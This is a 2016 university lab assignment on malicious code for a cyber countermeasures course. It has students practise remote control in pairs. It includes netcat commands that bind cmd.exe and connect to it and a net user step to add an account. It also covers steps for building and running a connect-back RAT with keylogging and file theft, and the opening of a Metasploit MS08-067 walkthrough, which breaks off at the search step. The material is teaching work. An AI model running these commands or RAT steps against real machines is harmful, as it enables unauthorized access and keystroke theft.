Experiment report four

People's Public Security University of China

Chinese people’ public security university

cyber countermeasures

experimental report

Experiment 4

Malicious code technology

student name	Zhang Jiuqi
grade	Level 15
District team	District 5 team
mentor	Takami

School of Information Technology and Cyber Security

November 7 , 2016 _ _

General outline of experimental tasks

The first semester of the 2016-2017 school year

1. The purpose of the experiment

1. Through the practice of Trojans, readers can understand and master the mechanism of Trojan propagation and operation; by manually deleting Trojans, master the skills of checking and deleting Trojans, learn the relevant knowledge of defense against Trojans, and deepen the security awareness of Trojans.

2. Understand and be familiar with common network attack tools and basic functions of Trojans;

3. To achieve the purpose of consolidating course knowledge and practical application.

2. Experimental requirements

1. Carefully read the content of each experiment. For topics that require screenshots, clear screenshots should be taken and the screenshots should be marked and explained.

2. The document requires a clear structure, accurate graphic and textual expression, and standardized labeling. The reasoning content is objective, reasonable and logical.

3. Software tools can use NC , MSF , etc.

4. After the experiment is over, keep the electronic documentation.

3. Experimental steps

1. Prepare

Prepare for the experiment in advance. Before the experiment, you should have a detailed understanding of the experimental purpose, experimental requirements and experimental content, be familiar with and prepare the software tools for the experiment, and prepare the experimental content in advance according to the experimental content and requirements.

2. lab environment

Describe the hardware and software environment (including various software tools) used in the experiment;

Boot and start the software office2003 or 2007, browser, encryption and decryption software.

3. experiment procedure

1) Start the system and start the tool software environment.

2) Use software tools to realize the experimental content.

4. experimental report

Write the experimental report according to the unified required experimental report format. Embed the document written according to the template format into the experimental report document, the document should be written according to the prescribed writing format, and the tables should have tables and graphs and pictures.

Task 1 Use NC to control the computer

NetCat, known as the network saber, is compact and powerful. It is said that it is compact and powerful because its software size has now been compressed to only a dozen KB, and its functions are not reduced at all.

The experimental process requires two students to cooperate with each other to complete:

step one:

Enter the following command on the victim's machine (classmate A) :
　　nc.exe -l -p port -e cmd.exe to enter monitor mode

Step 2: Enter the following command
　　on the attacker's machine. (Classmate B) : 　　nc ip port //Connect to victim_IP, and then get a shell. (requires screenshot)

Step 3:

In the shell, add a user with net user username/password/add , and authenticate with the net user command on the victim's machine. (requires screenshot)

It is possible to continue to do some things via the command line.

Task 2 uses a Trojan to control the computer

The experiment process requires the cooperation of two students:

step one:

　Attacker's machine. (Classmate A)
Open the V2014.exe program or star RAT. These two Trojans have similar functions.

Step 2:
　　Click "Generate Service" in the menu bar, in the pop-up configuration server, configure the IP address (attacker's IP) and port number for the connection back , and click the "Generate" button to generate the Trojan server.

Step 3:

Copy the generated Trojan executable to the victim's machine and double-click to run it.

Step 4:

Check the Trojan's online status in the console, and test and take screenshots of each of the following functions.

File management, try to copy files

screen control, try to get desktop

Keylogging, try to get the other party's keystroke record

Session management, restart the other machine, check whether it can automatically start online

Session management, uninstall each other's Trojan.

Task 3 Obtaining the shell through the loophole ( made in the Hetian platform ) Screenshots of all the processes Write a blog

windows ms08067 exploit

Metasploit is an open source security vulnerability detection tool. The Metasploit Framework (MSF) was released as an open source in 2003 and is a freely available development framework. It is a powerful open source platform for developing, testing and using malicious code, this environment provides a reliable platform for penetration testing, shellcode writing and vulnerability research. This scalable model integrates payload control (payload), encoder (encode), no-op generator (nops), and exploits, making the Metasploit Framework an avenue for researching high-severity exploits. It integrates common overflow vulnerabilities and popular shellcodes on various platforms, and is continuously updated.

Metasploit Framework does not only have the function of exploit (overflow) collection, it allows you to focus on creating your own overflow module or secondary development. A few parts are implemented in assembly and C, and the rest are implemented in ruby. Overall architecture:

1.2 Training environment

Windows XP SP3

IP：172.16.211.129

Kali Linux

IP：172.16.211.128

1.3 Principles of practical training

Vulnerability Name: Windows Server Services RPC Request Buffer Overflow Vulnerability (MS08-067) This security update resolves a privately reported vulnerability in Server Services. The vulnerability could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authenticating. This vulnerability could be used to conduct worm attacks. Firewall best practices and standard default firewall configurations help protect network resources from attacks originating from outside the enterprise.

1.4 Vulnerability Exploitation Process

在msfconsole使用search命令搜索MS08067漏洞攻击程序